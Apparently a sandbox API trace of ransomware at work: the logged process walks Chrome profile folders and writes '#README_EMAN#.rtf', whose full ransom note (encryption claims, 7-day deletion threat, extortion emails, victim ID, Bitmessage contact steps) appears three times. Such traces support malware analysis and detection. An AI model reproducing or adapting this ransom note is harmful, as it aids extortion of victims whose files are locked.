Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_CN\\", cchCount2=133) returned 1 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\", cchCount2=130) returned 1 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount1=129, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\", cchCount2=130) returned 3 [0286.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\", cchCount2=130) returned 3 [0286.375] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\#readme_eman#.rtf")) returned 0xffffffff [0286.375] GetLastError () returned 0x2 [0286.375] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0286.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n 